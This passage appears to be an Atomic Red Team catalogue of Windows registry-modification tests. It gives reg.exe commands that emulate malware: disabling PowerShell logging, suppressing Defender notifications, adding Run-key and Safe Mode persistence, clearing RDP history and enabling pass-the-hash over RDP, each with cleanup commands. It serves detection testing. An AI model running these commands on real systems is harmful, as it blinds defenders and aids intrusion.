## Atomic Test #19 - Activate Windows NoRun Group Policy Feature
Modify the registry of the currently logged in user using reg.exe via cmd console to Remove Run menu from Start Menu Group Policy.
Take note that some Group Policy changes might require a restart to take effect.
See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
**Supported Platforms:** Windows
**auto_generated_guid:** d49ff3cc-8168-4123-b5b3-f057d9abbd55
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /f
```
<br/>
<br/>
## Atomic Test #20 - Activate Windows NoFind Group Policy Feature
Modify the registry of the currently logged in user using reg.exe via cmd console to Remove Search menu from Start Menu Group Policy.
Take note that some Group Policy changes might require a restart to take effect.
See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
**Supported Platforms:** Windows
**auto_generated_guid:** ffbb407e-7f1d-4c95-b22e-548169db1fbd
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #21 - Activate Windows NoControlPanel Group Policy Feature
Modify the registry of the currently logged in user using reg.exe via cmd console to Disable Control Panel Group Policy.
Take note that some Group Policy changes might require a restart to take effect.
See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
**Supported Platforms:** Windows
**auto_generated_guid:** a450e469-ba54-4de1-9deb-9023a6111690
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #22 - Activate Windows NoFileMenu Group Policy Feature
Modify the registry of the currently logged in user using reg.exe via cmd console to Remove File menu from Windows Explorer Group Policy.
Take note that some Group Policy changes might require a restart to take effect.
See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
**Supported Platforms:** Windows
**auto_generated_guid:** 5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileMenu /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileMenu /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #23 - Activate Windows NoClose Group Policy Feature
Modify the registry of the currently logged in user using reg.exe via cmd console to Disable and remove the Shut Down command Group Policy.
Take note that some Group Policy changes might require a restart to take effect.
See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
**Supported Platforms:** Windows
**auto_generated_guid:** 12f50e15-dbc6-478b-a801-a746e8ba1723
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #24 - Activate Windows NoSetTaskbar Group Policy Feature
Modify the registry of the currently logged in user using reg.exe via cmd console to Disable changes to Taskbar and Start Menu Settings Group Policy.
Take note that some Group Policy changes might require a restart to take effect.
See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
**Supported Platforms:** Windows
**auto_generated_guid:** d29b7faf-7355-4036-9ed3-719bd17951ed
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetTaskbar /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetTaskbar /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #25 - Activate Windows NoTrayContextMenu Group Policy Feature
Modify the registry of the currently logged in user using reg.exe via cmd console to Disable context menu for taskbar Group Policy.
Take note that some Group Policy changes might require a restart to take effect.
See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
**Supported Platforms:** Windows
**auto_generated_guid:** 4d72d4b1-fa7b-4374-b423-0fe326da49d2
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoTrayContextMenu /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoTrayContextMenu /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #26 - Activate Windows NoPropertiesMyDocuments Group Policy Feature
Modify the registry of the currently logged in user using reg.exe via cmd console to hide Properties from "My Documents icon" Group Policy.
Take note that some Group Policy changes might require a restart to take effect.
See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
**Supported Platforms:** Windows
**auto_generated_guid:** 20fc9daa-bd48-4325-9aff-81b967a84b1d
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoPropertiesMyDocuments /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoPropertiesMyDocuments /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #27 - Hide Windows Clock Group Policy Feature
Modify the registry of the currently logged in user using reg.exe via cmd console to Hide Clock Group Policy.
Take note that some Group Policy changes might require a restart to take effect.
See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
**Supported Platforms:** Windows
**auto_generated_guid:** 8023db1e-ad06-4966-934b-b6a0ae52689e
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideClock /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideClock /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #28 - Windows HideSCAHealth Group Policy Feature
Modify the registry of the currently logged in user using reg.exe via cmd console to remove security and maintenance icon Group Policy.
Take note that some Group Policy changes might require a restart to take effect.
See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
**Supported Platforms:** Windows
**auto_generated_guid:** a4637291-40b1-4a96-8c82-b28f1d73e54e
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAHealth /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAHealth /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #29 - Windows HideSCANetwork Group Policy Feature
Modify the registry of the currently logged in user using reg.exe via cmd console to remove the networking icon Group Policy.
Take note that some Group Policy changes might require a restart to take effect.
See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
**Supported Platforms:** Windows
**auto_generated_guid:** 3e757ce7-eca0-411a-9583-1c33b8508d52
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCANetwork /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCANetwork /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #30 - Windows HideSCAPower Group Policy Feature
Modify the registry of the currently logged in user using reg.exe via cmd console to remove the battery icon Group Policy.
Take note that some Group Policy changes might require a restart to take effect.
See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
**Supported Platforms:** Windows
**auto_generated_guid:** 8d85a5d8-702f-436f-bc78-fcd9119496fc
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAPower /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAPower /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #31 - Windows HideSCAVolume Group Policy Feature
Modify the registry of the currently logged in user using reg.exe via cmd console to remove the volume icon Group Policy.
Take note that some Group Policy changes might require a restart to take effect..
See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
**Supported Platforms:** Windows
**auto_generated_guid:** 7f037590-b4c6-4f13-b3cc-e424c5ab8ade
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAVolume /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAVolume /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #32 - Windows Modify Show Compress Color And Info Tip Registry
Modify the registry of the currently logged in user using reg.exe via cmd console to show compress color and show tips feature.
See how hermeticwiper uses this technique - https://www.splunk.com/en_us/blog/security/detecting-hermeticwiper.html
**Supported Platforms:** Windows
**auto_generated_guid:** 795d3248-0394-4d4d-8e86-4e8df2a2693f
#### Attack Commands: Run with `command_prompt`!
```cmd
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /t REG_DWORD /d 0 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /t REG_DWORD /d 0 /f
```
#### Cleanup Commands:
```cmd
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /f >nul 2>&1
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #33 - Windows Powershell Logging Disabled
Modify the registry of the currently logged in user using reg.exe via cmd console to disable Powershell Module Logging, Script Block Logging, Transcription and Script Execution
see https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableModuleLogging
**Supported Platforms:** Windows
**auto_generated_guid:** 95b25212-91a7-42ff-9613-124aca6845a8
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /v EnableModuleLogging /t REG_DWORD /d 0 /f
reg add HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /v EnableScriptBlockLogging /t REG_DWORD /d 0 /f
reg add HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /t REG_DWORD /d 0 /f
reg add HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /t REG_DWORD /d 0 /f
reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /f >nul 2>&1
```
#### Cleanup Commands:
```cmd
reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /v EnableModuleLogging /f >nul 2>&1
reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /v EnableScriptBlockLogging /f >nul 2>&1
reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #34 - Windows Add Registry Value to Load Service in Safe Mode without Network
Modify the registry to allow a driver, service, to persist in Safe Mode.
see https://redcanary.com/blog/tracking-driver-inventory-to-expose-rootkits/ and https://blog.didierstevens.com/2007/03/26/playing-with-safe-mode/ for further details.
Adding a subkey to Minimal with the name of your service and a default value set to Service, makes that your service will be started when you boot into Safe Mode without networking. The same applies for the Network subkey.
**Supported Platforms:** Windows
**auto_generated_guid:** 1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AtomicSafeMode" /VE /T REG_SZ /F /D "Service"
```
#### Cleanup Commands:
```cmd
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AtomicSafeMode" /f
```
<br/>
<br/>
## Atomic Test #35 - Windows Add Registry Value to Load Service in Safe Mode with Network
Modify the registry to allow a driver, service, to persist in Safe Mode with networking.
see https://redcanary.com/blog/tracking-driver-inventory-to-expose-rootkits/ and https://blog.didierstevens.com/2007/03/26/playing-with-safe-mode/ for further details.
Adding a subkey to Netowrk with the name of your service and a default value set to Service, makes that your service will be started when you boot into Safe Mode with networking.
**Supported Platforms:** Windows
**auto_generated_guid:** c173c948-65e5-499c-afbe-433722ed5bd4
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AtomicSafeMode" /VE /T REG_SZ /F /D "Service"
```
#### Cleanup Commands:
```cmd
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AtomicSafeMode" /f
```
<br/>
<br/>
## Atomic Test #36 - Disable Windows Toast Notifications
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows toast notification.
See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
**Supported Platforms:** Windows
**auto_generated_guid:** 003f466a-6010-4b15-803a-cbb478a314d7
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications /v ToastEnabled /t REG_DWORD /d 0 /f
```
#### Cleanup Commands:
```cmd
reg delete HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications /v ToastEnabled /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #37 - Disable Windows Security Center Notifications
Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows security center notification.
See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
**Supported Platforms:** Windows
**auto_generated_guid:** 45914594-8df6-4ea9-b3cc-7eb9321a807e
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ImmersiveShell /v UseActionCenterExperience /t REG_DWORD /d 0 /f
```
#### Cleanup Commands:
```cmd
reg delete HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ImmersiveShell /v UseActionCenterExperience /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #38 - Suppress Win Defender Notifications
Modify the registry of the currently logged in user using reg.exe via cmd console to suppress the windows defender notification.
See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
**Supported Platforms:** Windows
**auto_generated_guid:** c30dada3-7777-4590-b970-dc890b8cf113
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #39 - Allow RDP Remote Assistance Feature
Modify the registry of the currently logged in user using reg.exe via cmd console to allow rdp remote assistance feature. This feature allow specific
user to rdp connect on the targeted machine.
See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
**Supported Platforms:** Windows
**auto_generated_guid:** 86677d0e-0b5e-4a2b-b302-454175f9aa9e
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg delete "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #40 - NetWire RAT Registry Key Creation
NetWire continues to create its home key (HKCU\SOFTWARE\NetWire) as well as adding it into the auto-run group in the victims registry.
See how NetWire malware - https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/
**Supported Platforms:** Windows
**auto_generated_guid:** 65704cd4-6e36-4b90-b6c1-dc29a82c8e56
#### Attack Commands: Run with `command_prompt`!
```cmd
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NetWire /t REG_SZ /d "C:\Users\admin\AppData\Roaming\Install\Host.exe" /f
reg add HKCU\SOFTWARE\NetWire /v HostId /t REG_SZ /d HostId-kai6Ci /f
reg add HKCU\SOFTWARE\NetWire /v "Install Date" /t REG_SZ /d "2021-08-30 07:17:27" /f
```
#### Cleanup Commands:
```cmd
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NetWire /f >nul 2>&1
reg delete HKCU\SOFTWARE\NetWire /va /f >nul 2>&1
reg delete HKCU\SOFTWARE\NetWire /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #41 - Ursnif Malware Registry Key Creation
Ursnif downloads additional modules from the C&C server and saves these in the registry folder HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\
More information - https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/
**Supported Platforms:** Windows
**auto_generated_guid:** c375558d-7c25-45e9-bd64-7b23a97c1db0
#### Attack Commands: Run with `command_prompt`!
```cmd
reg add HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /v comsxRes /t REG_BINARY /d 72656463616e617279 /f
```
#### Cleanup Commands:
```cmd
reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /va /f >nul 2>&1
reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #42 - Terminal Server Client Connection History Cleared
The built-in Windows Remote Desktop Connection (RDP) client (mstsc.exe) saves the remote computer name (or IP address) and the username that is used to login after each successful connection to the remote computer
**Supported Platforms:** Windows
**auto_generated_guid:** 3448824b-3c35-4a9e-a8f5-f887f68bea21
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
```
#### Dependencies: Run with `powershell`!
##### Description: Must have the "MR9" Remote Desktop Connection history Key
##### Check Prereq Commands:
```powershell
if ((Get-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Default\").MR9) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -path "HKCU:\SOFTWARE\Microsoft\" -name "Terminal Server Client" -ErrorAction Ignore
New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\" -name "Default" -ErrorAction Ignore
New-Itemproperty -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Default" -name "MR9" -value "127.0.0.1" -PropertyType "String" -ErrorAction Ignore
New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\" -name "Servers" -ErrorAction Ignore
New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Servers" -name "Redcanary" -ErrorAction Ignore
```
<br/>
<br/>
## Atomic Test #43 - Disable Windows Error Reporting Settings
Modify the registry of the currently logged in user using reg.exe via cmd console to disable windows error reporting settings. This Windows feature allow the use to report bug, errors, failure or problems
encounter in specific application or process.
See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
**Supported Platforms:** Windows
**auto_generated_guid:** d2c9e41e-cd86-473d-980d-b6403562e3e1
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add HKLM64\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```cmd
reg delete HKLM64\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /f >nul 2>&1
reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #44 - DisallowRun Execution Of Certain Applications
Modify the registry of the currently logged in user using reg.exe via cmd console to prevent user running specific computer programs that could aid them in manually removing malware or detecting it
using security product.
**Supported Platforms:** Windows
**auto_generated_guid:** 71db768a-5a9c-4047-b5e7-59e01f188e84
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisallowRun /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /f /t REG_SZ /v art1 /d "regedit.exe"
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /f /t REG_SZ /v art2 /d "cmd.exe"
```
#### Cleanup Commands:
```cmd
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisallowRun /f >nul 2>&1
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v art1 /f >nul 2>&1
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v art2 /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #45 - Enabling Restricted Admin Mode via Command_Prompt
Enabling Restricted Admin Mode via Command_Prompt,enables an attacker to perform a pass-the-hash attack using RDP.
See [Passing the Hash with Remote Desktop](https://www.kali.org/blog/passing-hash-remote-desktop/)
**Supported Platforms:** Windows
**auto_generated_guid:** fe7974e5-5813-477b-a7bd-311d4f535e83
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "hklm\system\currentcontrolset\control\lsa" /f /v DisableRestrictedAdmin /t REG_DWORD /d 0
```
#### Cleanup Commands:
```cmd
reg delete "hklm\system\currentcontrolset\control\lsa" /f /v DisableRestrictedAdmin >nul 2>&1
```
<br/>
<br/>
## Atomic Test #46 - Mimic Ransomware - Enable Multiple User Sessions
This test emulates Mimic ransomware's ability to enable multiple user sessions by modifying the AllowMultipleTSSessions value within the Winlogon registry key.
See [Mimic Ransomware Overview] (https://www.trendmicro.com/en_us/research/23/a/new-mimic-ransomware-abuses-everything-apis-for-its-encryption-p.html)
**Supported Platforms:** Windows
**auto_generated_guid:** 39f1f378-ba8a-42b3-96dc-2a6540cfc1e3
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Winlogon /t REG_DWORD /v AllowMultipleTSSessions /d 1 /f
```
#### Cleanup Commands:
```cmd
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Winlogon /v AllowMultipleTSSessions /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #47 - Mimic Ransomware - Allow Multiple RDP Sessions per User
This test emulates Mimic ransomware's ability to enable multiple RDP sessions per user by modifying the fSingleSessionPerUser value within the Terminal Server registry key.
See [Mimic Ransomware Overview] (https://www.trendmicro.com/en_us/research/23/a/new-mimic-ransomware-abuses-everything-apis-for-its-encryption-p.html)
**Supported Platforms:** Windows
**auto_generated_guid:** 35727d9e-7a7f-4d0c-a259-dc3906d6e8b9
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
```
#### Cleanup Commands:
```cmd
reg delete "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /f >nul 2>&1
```
<br/>
<br/>
## Atomic Test #48 - Event Viewer Registry Modification - Redirection URL
Modify event viewer registry values to alter the behavior of the online help redirection. Upon opening an event in event viewer and attempting to view the help page for the event, it will open the URL or execute the program defined in the redirection URL registry entry.
**Supported Platforms:** Windows
**auto_generated_guid:** 6174be7f-5153-4afd-92c5-e0c3b7cdb5ae
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| redirection_url | URL to open or file URI to execute upon opening the event help | url | file://C:&#92;windows&#92;system32&#92;notepad.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Event Viewer" /v MicrosoftRedirectionURL /t REG_SZ /d "#{redirection_url}" /f
```
#### Cleanup Commands:
```cmd
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Event Viewer" /v MicrosoftRedirectionURL /t REG_SZ /d "http://go.microsoft.com/fwlink/events.asp" /f
```
<br/>
<br/>
## Atomic Test #49 - Event Viewer Registry Modification - Redirection Program
Modify event viewer registry values to alter the behavior of the online help redirection. Upon opening an event in event viewer and attempting to view the help page for the event, it will execute the program defined in the redirection program registry entry.
**Supported Platforms:** Windows
**auto_generated_guid:** 81483501-b8a5-4225-8b32-52128e2f69db
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| redirection_program | Path of the program to execute upon opening the event help | path | C:&#92;windows&#92;system32&#92;notepad.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Event Viewer" /v MicrosoftRedirectionProgram /t REG_EXPAND_SZ /d "#{redirection_program}" /f
```
#### Cleanup Commands:
```cmd
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Event Viewer" /v MicrosoftRedirectionProgram /t REG_EXPAND_SZ /f
```
<br/>
<br/>
## Atomic Test #50 - Enabling Remote Desktop Protocol via Remote Registry
Enabling RDP through remote registry.
**Supported Platforms:** Windows
**auto_generated_guid:** e3ad8e83-3089-49ff-817f-e52f8c948090
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f
```
#### Cleanup Commands:
```cmd
reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 2 /f
```
<br/>
<br/>
## Atomic Test #51 - Disable Win Defender Notification
Disable Win Defender Notification. Redline is using this to disable this win defender feature.
**Supported Platforms:** Windows
**auto_generated_guid:** 12e03af7-79f9-4f95-af48-d3f12f28a260
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
